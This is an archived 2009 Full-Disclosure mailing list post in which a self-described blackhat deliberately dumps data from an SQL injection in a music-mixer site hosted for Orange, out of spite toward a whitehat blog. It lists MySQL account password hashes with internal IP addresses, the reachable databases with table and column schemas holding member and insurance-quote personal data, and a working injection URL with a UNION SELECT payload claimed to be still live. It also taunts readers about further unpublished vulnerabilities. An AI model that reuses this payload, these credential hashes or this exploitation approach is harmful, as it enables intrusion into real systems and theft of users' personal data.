[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <20090528174329.D8E452003F@smtp.hushmail.com>
Date: Thu, 28 May 2009 18:43:29 +0100
From: whitehatscum@...h.ai
To: full-disclosure@...ts.grok.org.uk
Subject: HackersBlog: WhiteHat Scum
NP: Down - Jay Sean ft. Lil Wayne
Right.
--
NOTICE**: THIS IS NOT AN ATTACK ON ORANGE, IM FED UP WITH
WHITEHAT BASTARDS POSTING ALL THEIR CRAP.
NO-ONE GIVES A FUCK, WE GOT THE POINT, NOW STOP BEFORE YOU PISS
EVEN MORE PEOPLE OFF.
--
Ive had enough of your fucking whitehat disclosure, so Im going to
be disclosing sqls completelely irresponsibly, complete with
database dumps, etc etc. Fuck you. Basically the plan was to expose
this bug before you, but it seems another do-gooder was on the
case. Damn. Sucks to be you anyway, I've had this bug for about 3
months. So, basically, Im going to tell everyone where the fuck
this bug is.
Sorry Orange, anyone affected by this. I guess tonight I let the
kid inside out. Blame HackersBlog.
Fuck you hackersblog, for showing how goddamn bad an sql injection
is.
This server is run by daily.co.uk. YES HACKERSBLOG, IT ISNT AN
OFFICIAL ORANGE.CO.UK SERVER, AND ISNT CONNECTED WITH THEIR MAIN
WEBSITE. *shock*
PATH: /disk/home/pointblankftp/orangemixer/mixerweb/
Server info;
DB: orangemixer (NOT FOR LONG, ENUMERATION FTW)
user(): mixer@....30.1.80
Mysql VER: 5.0.32-Debian_7etch1-log
NP: R.O.O.T.S - Flo Rida
mysql.user hashes
localhost:root:558d6f483ea11dfb
localhost:debian sys-
maint:*46C8AF861EBF825A181B4CE0239F5DE73F7B668E
172.30.1.235:nagioscheck:4e199f4042a61be2
172.30.1.209:replicator:*E0830EF8EC2A9D75B0E5BAA867845D5E99E6CD77
%:statcheck:313911396edb17c7
172.30.1.70:hypeadmin:*99ECE6D0716E7C2FF13C2B9B489C56B54AD8CE48
84.45.12.211:tibroot:*2DEF776957EB1E8D5C51E9FB64167876A1F2720B
172.30.1.219:bikingneeds:*2BA86DF19B2253BC6C46499D71C69990805EF1F8
84.45.12.211:kirk:*81D69EADA54E3C189C064C9B505807D2AD819F6F
172.30.1.235:wikiuser:*B0E342E7C7B4458184DD7F4FBB29A8662B528848
172.30.1.80:hypeadmin:*99ECE6D0716E7C2FF13C2B9B489C56B54AD8CE48
212.49.204.130:tibreader:*4F16C2B5304F77E16A7FDCF595D5010B2020283C
172.30.1.221:bikingneeds:*2BA86DF19B2253BC6C46499D71C69990805EF1F8
172.30.1.219:fc:*8CF4773A25CECF8E153AE5E206535EEE7A454AD4
172.30.1.221:fc:*8CF4773A25CECF8E153AE5E206535EEE7A454AD4
172.30.1.220:fc:N
172.30.1.220:fcselect:*8CF4773A25CECF8E153AE5E206535EEE7A454AD4
172.30.1.80:schoolsmixer:*22F1B42F8C50ABB2C00419CDFE68184DC4EA274A
172.30.1.80:mixer:*7DF16724880AEAF28CA1DA24D93E3304BFFB6532
172.30.1.80:teenkmixer:*81888B215271930A990B5715D242A30E62BD191A
172.30.1.70:renderer:*9110B92FA01DC8BC6D02C017505EDE2D1D0D47D8
172.30.1.70:mixer:*7DF16724880AEAF28CA1DA24D93E3304BFFB6532
172.30.1.70:teenkmixer:*81888B215271930A990B5715D242A30E62BD191A
172.30.1.70:schoolsmixer:*22F1B42F8C50ABB2C00419CDFE68184DC4EA274A
172.30.1.70:pbmixer:*0A47AAA2E4F79C623C272A6ACB2C674AB8ECF75C
172.30.1.80:renderer:*9110B92FA01DC8BC6D02C017505EDE2D1D0D47D8
172.30.1.80:pbmixer:*0A47AAA2E4F79C623C272A6ACB2C674AB8ECF75C
172.30.1.80:pointblankdb:*A5B6D0A4201A17B0CB60FA7FA36F062029683A92
172.30.1.70:pointblankdb:*A5B6D0A4201A17B0CB60FA7FA36F062029683A92
172.30.1.70:pblearning:*D133C50E0A402163BBD26AC5D8C6136C4AABBE9A
172.30.1.80:pblearning:*D133C50E0A402163BBD26AC5D8C6136C4AABBE9A
172.30.1.70:db_pointbl_wrdp1:*A1826A0C207A5A4A4DDE1BF3229353C364040
E37
172.30.1.70:db_pbmusic:*EC23EA59532A54F4630481380A843C2BB7B69D54
172.30.1.70:db_pbl_shop:*4E342D7F6F0FC012DCE765F85F082E2E6B5020DC
172.30.1.70:epoikuser:*E6591B87F54809F5DFD73A8F75666C0B3FC3CD1B
%:monitor:*28DFC4B1E76C94077186F47078963DFF9D79331E
localhost:backup:*2BD06E765955E7DA34354171D4AB0927A1DB7D69
172.30.1.80:db_pointbl_wrdp1:*A1826A0C207A5A4A4DDE1BF3229353C364040
E37
172.30.1.80:db_pbmusic:*EC23EA59532A54F4630481380A843C2BB7B69D54
172.30.1.80:db_pbl_shop:*4E342D7F6F0FC012DCE765F85F082E2E6B5020DC
172.30.1.80:epoikuser:*E6591B87F54809F5DFD73A8F75666C0B3FC3CD1B
%:hypeadmin:N
172.30.1.105:tamar_wordpress:*FDE232A185E30264C640E8ED6C64177A2A2DA
B11
Hm... I wonder what DB's we can access......
bikingneeds
epoikcom_pointblankonline
fc_needs
mysql
nocmediawiki
orangemixer
pbmixer
pointbl_shop
pointbl_wrdp1
pointblanklearning
pointblankmusic
schoolsmixer
tamar_blog
teenkmixer
test
thehype
tiberius
tiberius_test
sweet, wow, this sure is a lot more helpful than the whitehat scum
at hackersblog.org make everything
DB: bikingneeds
Table: Columns
affiliate:
affiliate_id,phone_number,tag,keyword_category,insert_datetime,updat
e_datetime
business_type:
business_type_id,business_type,insert_datetime,update_datetime,busin
ess_code
immobiliser:
immobiliser_id,immobiliser_code,description,insert_datetime,update_d
atetime
insurance:
insurance_id,title,panel_code,name,insert_datetime,update_datetime
insuranceimage:
insuranceimage_id,insurance_id,image,insert_datetime,update_datetime
occupation:
occupation_id,occupation,insert_datetime,update_datetime,occupation_
codequote:
quote_id,quote_name,product_name,customer_name,finished,deleted,sess
ion_key,quote_ref,tracking_ref,date_last_edited,date_completed,retur
ned_to,page_completed,insert_datetime,update_datetime
quote_data:
quote_data_id,quote_id,name,value,insert_datetime,update_datetime
quote_group:
quote_group_id,parent_quote_id,child_quote_id,insert_datetime,update
_datetime
quote_qx_link:
quote_qx_link_id,quote_id,insert_datetime,update_datetime
quote_refs: quote,prefix,max_number,next_number
quote_titles:
quote_titles_id,title,field,section,insert_datetime,update_datetime
qxresults:
qxresults_id,quote_postion,quote_qx_link_id,name,value,insert_dateti
me,update_datetime
session: session_id,session_key,tag,insert_datetime,update_datetime
user:
user_id,email,password,user_status,insert_datetime,update_datetime
vehicle_make: vehicle_make_id,make,insert_datetime,update_datetime
vehicle_model:
vehicle_model_id,vehicle_make_id,model,engine_size,manufacture_start
_year,manufacture_end_year,abi_code,insert_datetime,update_datetime
vehicle_model_desc:
vehicle_model_desc_id,vehicle_model_id,model_desc,insert_datetime,up
date_datetime
DB: epoikcom_pointblankonline
Table: Columns
announcements: ID,postdate,text,classroomID,memberID
answers: ID,questionID,answerNumber,answerText,answerStatus
assignments:
ID,studentID,lessonID,formID,commentID,status,uploadDate,reviewDate
c_classrooms:
ID,moduleID,startDate,secondDay,thirdDay,classSize,timetable,studio,
ocnRegCode,ocnRAC
c_courses:
ID,name,moduleList,topic,duration,type,live,homeDisplay,listPosition
,content,related,resources,faq,payFull,payDepQ,payInsQCount,payInsQ,
payDepM,payInsMCount,payInsM,filename,metaTitle,metaDescription,meta
Keywords,pdfFile
c_interests: ID,name
c_jobs: ID,post,employer,text,status,listPosition
c_modules:
ID,name,price,topic,live,duration,content,filename,metaTitle,metaDes
cription,metaKeywords,related,resources,faq,feedback
c_news: ID,title,content,date,thumbnail,slot
c_payments:
ID,studentID,due,dueDate,paid,paidDate,discount,type,method,bookDate
,futurepayID,number
c_profiles: ID,name,title,text,photo,type,listPosition
c_rotatingcontent: ID,content,live,pos,delay
c_students:
ID,memberID,classroomID,moduleID,courseID,bookDate,reservedPlace,pay
ment,notes,confLetterSent,ocnLevel,ocnPoints,ocnCertRec,ocnCertSendD
ate
c_studios: ID,name,size
c_testimonials: ID,author,text,moduleID
classrooms: ID,moduleID,startDate,tutorID,chatRoom,chatDay,chatTime
comments:
ID,classroomID,formID,answer,postdate,file,text,pageID,membernicknam
e,memberID
countries:
ID,name,code2letter,code3letter,codeNumeric,currency,banned
currencies: currency,rate
elements:
ID,pageID,elementNumber,elementType,elementContent,elementFile,eleme
ntWidth,elementHeight
errors: ID,error,errorDate,solution,solutionDate,solved
feedbackanswers:
ID,classroomID,memberID,formID,questionID,questionNumber,userAnswerI
D,userAnswerText
forumcomments:
ID,classroomID,answer,postdate,file,text,membernickname,memberID,las
tanswerdate,title
geoiploc_test: IP,country,currency
homepollresults: IP,country,genre
inforequests: ID,moduleID,memberID
lessons: ID,lessonName,lessonNumber,lessonSyllabus,moduleID,live
members:
ID,nickname,password,email,firstname,lastname,title,address,country,
postcode,phone,howhear,profile,age,birthDate,regDate,timezoneID,time
zoneDST,genres,newsletter,updates,notifyall,notifyanswer,securitylev
el,realemail,visaRequired,howToStudy,interest,availability,status,ex
perience,registeredAt,ethnicity,religion,employmentStatus,ocnID
members_copy:
ID,nickname,password,email,firstname,lastname,title,address,country,
postcode,phone,howhear,profile,age,birthDate,regDate,genres,newslett
er,updates,notifyall,notifyanswer,securitylevel,realemail,howToStudy
,interest,availability,status,experience,registeredAt,ethnicity,reli
gion,employmentStatus,ocnID
modules:
ID,moduleName,moduleNumber,moduleLongDescription,moduleShortDescript
ion,type,listPosition,tutorProfile,developerID,studentFeedback,modul
eRequirements,live,free,freesample,landingPageID,payFull,payDepQ,pay
InsQCount,payInsQ,payDepM,payInsMCount,payInsM,lessonsNumber,fileNam
e,metaTitle,metaDescription,metaKeywords,related
p_features: ID,name
p_genres: ID,name
p_moods: ID,name
p_tunes: ID,artist,title,filename,genres,moods,features
pages: ID,pageName,pageNumber,lessonID,live
payments:
ID,studentID,due,dueDate,paid,paidDate,discount,type,method,bookDate
,futurepayID,number
questions: ID,formID,questionNumber,questionText,questionType
referralexpences: ID,referralID,date,amount,school
referrals: ID,name,category,listPosition
rotatingcontent: ID,content,live,pos,delay
sessions: session_id,session_data,expires
status:
ID,priority,postDate,dueDate,postedBy,postedFor,description,status,c
omment
students:
ID,memberID,classroomID,moduleID,payment,bookDate,reservedPlace,note
s,confLetterSent
testanswers:
ID,classroomID,memberID,formID,questionID,questionNumber,userAnswerI
D,correctAnswerID
testimonials: ID,number,text,sign,country
testscompleted: ID,memberID,classroomID,completeDate
timezone: timezoneid,gmt_offset,dst_offset,timezone_code,name
DB: fc_needs
Table: Columns
additional_driver:
id,partial_id,request_id,title,forenames,surname,date_of_birth,sex,r
esident_since,marital_status,relation_to_proposer,ft_employment_stat
us,ft_employer_code,ft_occupation_code,pt_employment_status,pt_emplo
yer_code,pt_occupation_code,smoker,license_type,license_date,how_man
y_tests,access_other_vehicles,motoring_org,insert_time
broker:
id,name,email,telephone,24_hour_claims,uk_call_centre,buy_online,ulr
_expenses,breakdown_available,breakdown_options,courtesy_van,windscr
een_cover,personal_accident,insert_time,update_time
claim:
id,partial_id,request_id,driver_id,claim_code,claim_date,insured_cos
t,third_party_cost,ncb_affected,personal_injury,accepted_fault,inser
t_time
claim_code: id,code,qx_code,description,insert_time
conviction:
id,partial_id,request_id,driver_id,conviction_code,conviction_date,f
ine,penalty_points,length_of_ban,alcohol_reading_type,alcohol_readin
g_level,related_accident,insert_time
employer_code: id,code,description,insert_time
job:
id,type,request_id,params,result,created,started,stopped,expires,sta
tus
occupation_code: id,code,description,insert_time
partial_request:
id,user_id,site,submitted,request_id,inception_date,cover_required,a
llowed_drivers,class_of_use,ncb_years,ncb_protected,policy_protected
,voluntary_excess,total_mileage,business_mileage,title,forenames,sur
name,date_of_birth,sex,resident_since,marital_status,ft_employment_s
tatus,ft_employer_code,ft_occupation_code,pt_employment_status,pt_em
ployer_code,pt_occupation_code,abode_type,flat_name_or_number,door_n
umber,address1,address2,address3,address4,address5,address6,town,cou
nty,postcode,daytime_phone,evening_phone,mobile_phone,email,smoker,h
omeowner,license_type,license_date,how_many_tests,access_other_vehic
les,motoring_org,registration,make,abi_code,cc,year_of_manufacture,w
here_kept,postcode_where_kept,keeper,owner,purchased,value,paid,sign
age,other_vehicles,immobiliser,alarm,tracker,lhd,abs,seats,trailer_c
over,trailer_value,contact_now,contact_related,state,insert_time,upd
ate_time
quote_request:
id,user_id,site,inception_date,cover_required,allowed_drivers,class_
of_use,ncb_years,ncb_protected,policy_protected,voluntary_excess,tot
al_mileage,business_mileage,title,forenames,surname,date_of_birth,se
x,resident_since,marital_status,ft_employment_status,ft_employer_cod
e,ft_occupation_code,pt_employment_status,pt_employer_code,pt_occupa
tion_code,abode_type,flat_name_or_number,door_number,address1,addres
s2,address3,address4,address5,address6,town,county,postcode,daytime_
phone,evening_phone,mobile_phone,email,smoker,homeowner,license_type
,license_date,how_many_tests,access_other_vehicles,motoring_org,regi
stration,make,abi_code,cc,year_of_manufacture,where_kept,postcode_wh
ere_kept,keeper,owner,purchased,value,paid,signage,other_vehicles,im
mobiliser,alarm,tracker,lhd,abs,seats,trailer_cover,trailer_value,co
ntact_now,contact_related,insert_time,update_time
quote_result:
id,user_id,request_id,transaction_id,webreference,recall_url,broker_
ref,insurer_code,insurer_name,premium,compulsory_excess,voluntary_ex
cess,screen_limit,audio_limit,phone_limit,contents_limit,green_card_
days,driving_other_cars,car_hire,legal_expenses,replacement_car,auth
orised_repairers,deposit,monthly_amount,number_payments,insert_time
security_device_code: id,vehicle_type,code,description,insert_time
session: session_key,user_id,runmode,quote_id,insert_time,data
user: id,username,password,insert_time,update_time
user_acl: id,user_id,is_admin,update_time
vehicle:
id,abi_code,make,model,body_type,cc,year_from,year_to,fuel,insert_ti
me
DB: nocmediawiki
Table: Columns
archive:
ar_namespace,ar_title,ar_text,ar_comment,ar_user,ar_user_text,ar_tim
estamp,ar_minor_edit,ar_flags
blobs: blob_index,blob_data
brokenlinks: bl_from,bl_to
categorylinks: cl_from,cl_to,cl_sortkey,cl_timestamp
cur:
cur_id,cur_namespace,cur_title,cur_text,cur_comment,cur_user,cur_use
r_text,cur_timestamp,cur_restrictions,cur_counter,cur_is_redirect,cu
r_minor_edit,cur_is_new,cur_random,cur_touched,inverse_timestamp
hitcounter: hc_id
image:
img_name,img_size,img_description,img_user,img_user_text,img_timesta
mp
imagelinks: il_from,il_to
interwiki: iw_prefix,iw_url,iw_local
ipblocks:
ipb_id,ipb_address,ipb_user,ipb_by,ipb_reason,ipb_timestamp,ipb_auto
,ipb_expiry
links: l_from,l_to
linkscc: lcc_pageid,lcc_cacheobj
logging:
log_type,log_action,log_timestamp,log_user,log_namespace,log_title,l
og_comment,log_params
math:
math_inputhash,math_outputhash,math_html_conservativeness,math_html,
math_mathml
objectcache: keyname,value,exptime
old:
old_id,old_namespace,old_title,old_text,old_comment,old_user,old_use
r_text,old_timestamp,old_minor_edit,old_flags,inverse_timestamp
oldimage:
oi_name,oi_archive_name,oi_size,oi_description,oi_user,oi_user_text,
oi_timestamp
querycache: qc_type,qc_value,qc_namespace,qc_title
recentchanges:
rc_id,rc_timestamp,rc_cur_time,rc_user,rc_user_text,rc_namespace,rc_
title,rc_comment,rc_minor,rc_bot,rc_new,rc_cur_id,rc_this_oldid,rc_l
ast_oldid,rc_type,rc_moved_to_ns,rc_moved_to_title,rc_patrolled,rc_i
p
searchindex: si_page,si_title,si_text
site_stats:
ss_row_id,ss_total_views,ss_total_edits,ss_good_articles,ss_total_pa
ges,ss_users,ss_admins
user:
user_id,user_name,user_real_name,user_password,user_newpassword,user
_email,user_options,user_touched,user_token
user_newtalk: user_id,user_ip
user_rights: ur_user,ur_rights
validate:
val_user,val_title,val_timestamp,val_type,val_value,val_comment
watchlist: wl_user,wl_namespace,wl_title
DB: orangemixer
Table: Columns
comments: ID,trackID,memberID,text,date
members:
ID,username,password,email,firstname,lastname,birthdate,votes,bayRat
ing
playtimes: ID,trackID,memberID,authorID,date
ratings: ID,trackID,memberID,date,rating,authorID
renderqueue:
ID,memberID,trackID,renderFile,mixerXML,memberEmail,publishDate,rend
erStarted,renderFinished,status,errortext
sessions: session_id,session_data,expires
tracks:
ID,title,memberID,genreID,length,publishFlag,renderFlag,description,
publishDate,editDate,playTimes,mixerXML,votes,bayRating,renderFile,c
ompetition
DB: pbmixer
Table: Columns
m_comments: ID,trackID,memberID,text,date
members:
ID,nickname,password,email,firstname,lastname,school,birthdate,votes
,bayRating
playtimes: ID,trackID,memberID,authorID,date
ratings: ID,trackID,memberID,date,rating,authorID
renderqueue:
ID,memberID,trackID,renderFile,mixerXML,memberEmail,publishDate,rend
erStarted,renderFinished,status,errortext
sessions: session_id,session_data,expires
tracks:
ID,title,memberID,genreID,length,publishFlag,renderFlag,description,
publishDate,editDate,playTimes,mixerXML,votes,bayRating,renderFile,c
ompetition
DB: pointbl_shop
Table: Columns
admin_users: id,username,password
freecontent:
id,sectionId,title,description,filename,added,contentType,ordering,d
ownloadText,productId
freecontent_downloadlog: id,fileId,downloaded
freecontent_sections:
id,parentId,sectionName,ordering,directory,description,subSectionsIn
Page
modules:
id,moduleName,moduleNumber,added,moduleDescription,availableDVD,list
Position
order_files: id,orderId,fileId,downloadsRemaining,downloadCode
orders:
id,orderTime,sendTime,productId,wpTransId,deliveryMethod,status,warn
ings,paidamount,fullName,address,postcode,country,email,phone,usersI
P,dataDump,howHeard,howHeardOther
podcast: id,posted,adminUserId,title,description,mediaFile
product_files: id,productId,fileDescription,fileName
products:
id,productName,productDescription,price,added,status,productNumber,t
railerFile,moduleId,summary,downloadAvailable,physicalAvailable,disp
layOnHomepage
DB: pointbl_wrdp1
Table: Columns
wp_categories:
cat_ID,cat_name,category_nicename,category_description,category_pare
nt
wp_comments:
comment_ID,comment_post_ID,comment_author,comment_author_email,comme
nt_author_url,comment_author_IP,comment_date,comment_date_gmt,commen
t_content,comment_karma,comment_approved,comment_agent,comment_type,
comment_parent,user_id
wp_linkcategories:
cat_id,cat_name,auto_toggle,show_images,show_description,show_rating
,show_updated,sort_order,sort_desc,text_before_link,text_after_link,
text_after_all,list_limit
wp_links:
link_id,link_url,link_name,link_image,link_target,link_category,link
_description,link_visible,link_owner,link_rating,link_updated,link_r
el,link_notes,link_rss
wp_options:
option_id,blog_id,option_name,option_can_override,option_type,option
_value,option_width,option_height,option_description,option_admin_le
vel,autoload
wp_post2cat: rel_id,post_id,category_id
wp_postmeta: meta_id,post_id,meta_key,meta_value
wp_posts:
ID,post_author,post_date,post_date_gmt,post_content,post_title,post_
category,post_excerpt,post_status,comment_status,ping_status,post_pa
ssword,post_name,to_ping,pinged,post_modified,post_modified_gmt,post
_content_filtered,post_parent,guid,menu_order
wp_users:
ID,user_login,user_pass,user_firstname,user_lastname,user_nickname,u
ser_nicename,user_icq,user_email,user_url,user_ip,user_domain,user_b
rowser,user_registered,user_level,user_aim,user_msn,user_yim,user_id
mode,user_activation_key,user_status,user_description
DB: pointblanklearning
Table: Columns
pages:
ID,section,identifier,type,name,filename,content,listPosition,metaTi
tle,metaDescription,metaKeywords
sessions: session_id,session_data,expires
DB: pointblankmusic
Table: Columns
blah: xcol
features: ID,name
genres: ID,name
moods: ID,name
tunes: ID,artist,title,filename,genres,moods,features
DB: schoolsmixer
Table: Columns
comments: ID,trackID,memberID,text,date
members:
ID,username,password,email,firstname,lastname,school,birthdate,votes
,bayRating
playtimes: ID,trackID,memberID,authorID,date
ratings: ID,trackID,memberID,date,rating,authorID
renderqueue:
ID,memberID,trackID,renderFile,mixerXML,memberEmail,publishDate,rend
erStarted,renderFinished,status,errortext
sessions: session_id,session_data,expires
tracks:
ID,title,memberID,genreID,length,publishFlag,renderFlag,description,
publishDate,editDate,playTimes,mixerXML,votes,bayRating,renderFile,c
ompetition
DB: tamar_blog
Table: Columns
wp_comments:
comment_ID,comment_post_ID,comment_author,comment_author_email,comme
nt_author_url,comment_author_IP,comment_date,comment_date_gmt,commen
t_content,comment_karma,comment_approved,comment_agent,comment_type,
comment_parent,user_id
wp_links:
link_id,link_url,link_name,link_image,link_target,link_category,link
_description,link_visible,link_owner,link_rating,link_updated,link_r
el,link_notes,link_rss
wp_options: option_id,blog_id,option_name,option_value,autoload
wp_postmeta: meta_id,post_id,meta_key,meta_value
wp_posts:
ID,post_author,post_date,post_date_gmt,post_content,post_title,post_
category,post_excerpt,post_status,comment_status,ping_status,post_pa
ssword,post_name,to_ping,pinged,post_modified,post_modified_gmt,post
_content_filtered,post_parent,guid,menu_order,post_type,post_mime_ty
pe,comment_count
wp_ratings:
rating_id,rating_postid,rating_posttitle,rating_rating,rating_timest
amp,rating_ip,rating_host,rating_username,rating_userid
wp_term_relationships: object_id,term_taxonomy_id,term_order
wp_term_taxonomy:
term_taxonomy_id,term_id,taxonomy,description,parent,count
wp_terms: term_id,name,slug,term_group
wp_usermeta: umeta_id,user_id,meta_key,meta_value
wp_users:
ID,user_login,user_pass,user_nicename,user_email,user_url,user_regis
tered,user_activation_key,user_status,display_name
wp_wpum_fields:
wpum_id,is_extra_field,name,label,description,type,min_length,max_le
ngth,equal,value,default_value,checking_type,can_be_empty,show_durin
g_reg,can_be_default,is_editable,display_row,reg_order,which_table,e
rror_msg
DB: teenkmixer
Table: Columns
comments: ID,trackID,memberID,text,date
members:
ID,username,password,email,firstname,lastname,birthdate,votes,bayRat
ing,town,profile
playtimes: ID,trackID,memberID,authorID,date,visitorIP
ratings: ID,trackID,memberID,date,rating,authorID,visitorIP
[188]renderqueue:
ID,memberID,trackID,renderFile,mixerXML,memberEmail,publishDate,rend
erStarted,renderFinished,status,errortext
sessions: session_id,session_data,expires
tracks:
ID,title,memberID,genreID,length,publishFlag,renderFlag,description,
publishDate,editDate,playTimes,mixerXML,votes,bayRating,renderFile,c
ompetition
DB: test
Table: Columns
testing: a
DB: thehype
Table: Columns
events:
ID,title,date,location,postcode,venue,description,price,organisation
,category,approved,timestamp
forum: ID,answerTo,authorID,postDate,title,text
news: ID,headline,content,category,timestamp
organisations:
ID,name,identifier,description,contact_info,category,postcode
pagecomments: cID,table,itemID,ctitle,text,userid,timestamp
pageratings: ID,pageID,score
pages:
ID,section,identifier,title,filename,content,listPosition,hassubpage
s,metaTitle,metaDescription,metaKeywords,authorID,creationDate,revie
werID,reviewDate,approved
polls: ID,title,content,result,status,category,date
sessions: session_id,session_data,expires
users:
ID,securityLevel,username,password,email,name,school,likes,dislikes,
profile,interests,picture,reviewerID,reviewDate,approved,flagged
DB tiberius
Table: Columns
audio_files: id,resource_id,uri,file_type,file_size,duration
capabilities: name,value,group_id,device_id
carriers: id,start_ip,end_ip,country_code,name
devices: id,user_agent,fall_back_id,actual_device,view_path
form_fields: id,resource_id,name,label
form_harvests: resource_id,last_visit_id,time
form_values: id,field_id,visit_id,value
image_regions: id,image_id,type,x1,y1,x2,y2
images:
id,resource_id,uri,format,quality,width,height,file_type,file_size
invites:
id,type,visitor_id,message,invited_by,sender,job_id,page_id,sent,acc
epted,expires,status
jobs:
id,type,params,result,created,started,stopped,expires,status,progres
s
locations: id,site_id,resource_id,type
log_requests:
id,site_id,url,user_agent,device_id,visitor_id,ip_address,headers,ca
rrier,request_time
log_responses:
id,site_id,request_id,visitor_id,handler,item_id,item_title,extra_pa
rams,status,errors,response_time
markups: id,fall_back_id,view_path
messages: id,site_id,type,sender,title,content
node_attrs: id,node_id,name,value
nodes: id,parent_id,type,content,offset
page_nodes: id,page_id,name,node_id
pages: id,resource_id,template_id,user_id,version,status,time,notes
poll_answers: id,poll_id,node_id,answer,votes
poll_votes: id,poll_id,answer_id,visitor_id,vote_time,user_agent
polls:
id,node_id,question,allow_multivote,hide_results_until,vote_delay,to
tal_votes
realms: id,name,title
resources: id,site_id,type,title
ringtones: id,resource_id,uri,quality,file_type,file_size
roles: id,name,title,about
sessions: id,time,data
site_keywords: site_id,keyword,shortcode
sites: id,realm_id,name,title
static_log_requests:
id,site_id,url,user_agent,device_id,visitor_id,ip_address,headers,ca
rrier,request_time
static_log_responses:
id,site_id,request_id,visitor_id,handler,item_id,item_title,extra_pa
rams,status,errors,response_time
style_props: id,name,value,style_id
styles: id,title,type,site_id
templates: id,resource_id,user_id,node_id,version,status,time,notes
unknown_devices: id,user_agent,headers,status,time
user_roles: id,site_id,user_id,role_id
users: id,realm_id,username,password,name,email,status
videos: id,resource_id,uri,quality,file_type,file_size
visitors: id,site_id,telephone,user_agent,registered,status,name
visits:
id,site_id,visitor_id,resource_type,resource_id,record_id,device_id,
time,status,data
widgets:
id,resource_id,type,user_id,node_id,version,status,time,notes
DB: tiberius_test
Table: Columns
album_songs: id,name,album_id,song_id
albums: id,title
capabilities: name,value,group_id,device_id
devices: id,user_agent,fall_back_id,actual_device,view_path
form_fields: id,resource_id,name,label
form_harvests: resource_id,last_visit_id,time
form_values: id,field_id,visit_id,value
image_regions: id,image_id,type,x1,y1,x2,y2
images:
id,resource_id,uri,format,quality,width,height,file_type,file_size
jobs:
id,type,params,result,created,started,stopped,expires,status,progres
s
locations: id,site_id,resource_id,type
markups: id,fall_back_id,view_path
messages: id,site_id,type,sender,title,content
node_attrs: id,node_id,name,value
nodes: id,parent_id,type,content,offset
page_nodes: id,page_id,name,node_id
pages: id,resource_id,template_id,user_id,version,status,time,notes
realms: id,name,title
resources: id,site_id,type,title
ringtones: id,resource_id,uri,quality,file_type,file_size
roles: id,name,title,about
sessions: id,time,data
sites: id,realm_id,name,title
songs: id,title
style_props: id,name,value,style_id
styles: id,title,type,site_id
templates: id,resource_id,user_id,node_id,version,status,time,notes
user_roles: id,site_id,user_id,role_id
users: id,realm_id,username,password,name,email,status
videos: id,resource_id,uri,quality,file_type,file_size
visitors:
id,site_id,telephone,user_agent,invite_job_id,registered,status
visits:
id,site_id,visitor_id,resource_type,resource_id,record_id,device_id,
time,status,data
widgets:
id,resource_id,type,user_id,node_id,version,status,time,notes,notes
Check out all the admin/user tables. Secure or what?
Btw, HackersBlog.org
your sql injection finding techniques suck balls. Ive found better
sqls on sites with LOAD_FILE/OUTFILE that you've posted before, so
really, stop playing 'eleet security guru'.
You fucking suck, you should be ashamed. You aren't hackers, merely
whitehat scum. We need pr0j3c7 m4yh3m back.
Greetz;
The BlackHat Scene, EFnet channels ( you know which chans you are
), certain hackers/groups (again, you know who you are) <3, The
Mentor (dude, your manifesto pretty much describes me perfectly).
Surprisingly, CounterMeasures @ TrendMicro. You seem like a pretty
cool person.
FuckYou;
Skiddie underlings of the net I.E.; unkn0wn.ws, h4cky0u.org (I mean
seriously, d13.0rg), the skids that play with milw0rm web vulns and
think they're the fucking shit. And if you hadnt guessed,
HackersBlog.org (stop acting like you're discovering new stuff).
HackersBlog.org, if you want to email me, please do. Dont expect me
to talk civilly.
By the way, comments such as 'wow, this is childish' etc are
stupid, merely pointing out that you think you are somehow
superior. Trust me, you arent.
While kids like us are rare, we are around.
Oh yeh, the sql injection.
Wow, this was hard to find.
I muzt be sum kinda pr0 haqqir.
http://mixer.orange.co.uk/explore.php?t=tr&id=-23 UNION ALL SELECT
1-- (btw, this should still be alive....)
Thanks. Pz.
btw;
Im feeling generous.
Times Online appears to run Oracle, it's rather sexy. I <3
injections in TimesOnline.co.uk. Wonder if you can find it....
Also, you missed other vulns in loads of sites you already
published articles about, but why would I help you? Go find it
yourself. I'll give you a bone, some of them have LOAD_FILE AND
OUTFILE :o:o:o:o:o:o:o:o Maybe you can become a real 'hacker'?
BTW, you suck. I just found another vuln in orange.co.uk, on their
main site. Wow. Not quite as serious as it isnt fully exploitable
(yet, h4h4h), but it is there. Im not releasing it. I'm not a
disclosing whore that has turned the scene into a business. Scum.
If you want to have a direct conversation, put a few messages in
some major, well known blackhat chans on EFnet. I will message you.
Email me at whitehatscum@...h.ai
--
Improve your driving ability with a stop at traffic school. Click now!
http://tagline.hushmail.com/fc/BLSrjkqhynusaiIkQ34Hyfhk1tu7thT41zOaiiZX9VHPHaKrp669uhxzv1W/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists